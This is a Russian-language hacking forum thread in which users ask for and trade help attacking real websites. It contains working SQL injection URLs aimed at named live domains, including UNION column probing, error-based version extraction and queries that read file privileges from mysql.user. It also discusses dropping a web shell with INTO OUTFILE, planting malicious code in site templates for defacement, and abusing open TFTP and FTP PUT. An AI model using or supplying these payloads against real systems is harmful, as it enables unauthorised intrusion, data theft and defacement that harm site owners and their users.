Ваши вопросы по уязвимостям.

ну ну...некоторые не зальют...

 

Обьясните как правильно шелл можно залить, что то не получается

 

Ты через админку или как?

 

через такой запрос я по логике должен залить шелл по адресу /var/www/html/1.php

ну не понятно заливается он или нет и п оследущему запросу я пытаюсь вызвать шелл, но опять же ничего не получается(((

ctacok: into outfile char?
Чарить хексить и т.п. нельзя, только ковычки.

 

winstrool, нельзя чарить путь в INTO OUTFILE.
Ctacok, есть такие кнопочки - "Post reply" && "Быстрый ответ" =)
Ctacok: Я не люблю гадить.

Какраз таки экранирует =)

 

Добрый день! Подскажите пожалуйста, можно ли как-то использовать удаленно через ip открытый порт 69 TFTP?

 

http://www.portugal-tchat.com/host_mes_images/view/870+union+select+1,2,3,4,5,6,7,8,9,10,11

подскажите, куды копать дальше?

 

URL уязвима

но я не могу найти число столбцов

http://www.team-dignitas.org/index.php?id=10104

 

крути как слепую..в ошибке указанно почему не можешь найти количество столбцов


http://www.team-dignitas.org/index.php?id=10104'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+news+group+by+2+limit+1)a)--+

By Pashkela

 

Помойму это не скуль!

 

Как вариант...
http://www.portugal-tchat.com/host_mes_images/view/870+and+if(mid(version(),1,1)=5,1,(select+1+union+select+2))

Условие выполняется - картинка, не выполняется - error.
Возможно все гораздо проще можно сделать...

 

Ребята, подскажи по поводу использования UPDATE в инъекциях.
Значит есть инъекция
UNION+SELECT+1,test_data,3+FROM+test_table+--+
пробую изменить значение test_data допустим на 12345 вот таким запросом
UNION+UPDATE+test_table+SET+test_data='12345'+WHERE+test_data2='lol'+--+
в результате выбивает ошибку вида

пробовал заменять значение на HEX кодировку, то есть вместо ='12345' тулил =0x3132333435. Результат - опять таки ошибка.
Подскажите, может быть я не так использую UPDATE, и всё дело в неправильном синтаксисе? Заранее благодарен.

 

Если запрсос select, значит SELECT, нельзя insert, update, и т.п., можно только выборку из бд делать.

 

А если у нас основной запрос вроде INSERT+INTO+test_table+(test_data)+VALUES+(lol), то UNION INSERT или UNION UPDATE прокатит?

 

Нет. Вы вообще вкурсе что делает union?

 

мдяс, думаю на лето надо закрыть данный раздел..так как 99% вопросы по скулям..причем стандартные вопросы, ответы на которые можно спокойно найти на форуме потратив 30 секунд

 

Этот сайт позволяет file_priv, но мы можем заполнить оболочку?
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,file_priv,3,4,5,6,7,8,9%20from%20mysql.user+--+

 

как получив шелл на фтп, можно заменить все шаблоны в БАЗЕ данных на вредноносный код(дефейс)?

 

У твоего пользователя нету file_priv:

Code:

http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9+--+

Получаем юзера - DCE. Смотрим дальше:

Code:

http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201,concat_ws(0x3a,user,file_priv),'3',4,5,6,7,8,9%20from%20mysql.user+limit+5,1+--+

Результат:

Code:

DCE:N

 

как использовать " PUT " уязвимость, в FTP ?..... (удаленный сервер)